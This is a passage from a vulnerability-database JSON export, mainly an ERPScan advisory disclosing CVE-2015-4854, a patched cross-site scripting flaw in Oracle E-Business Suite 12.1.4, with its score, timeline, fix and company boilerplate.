"2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32651", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32651", "title": "[USN-2786-1] PHP vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4854"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite Cross-site Scripting\r\nAdvisory ID: [ERPSCAN-15-027]\r\nAdvisory URL:http://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: Cross-site Scripting\r\nImpact: impersonation, information disclosure\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4854\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality None (N)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nAn anonymous attacker can create a special link that injects malicious JS code\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nCfgOCIReturn servlet is vulnerable to Cross-site Scripting (XSS) due\r\nto lack of sanitizing the "domain" parameter.\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32658", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32658", "title": "[ERPSCAN-15-027] Oracle E-Business Suite - Cross Site Scripting Vulnerability", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}]}
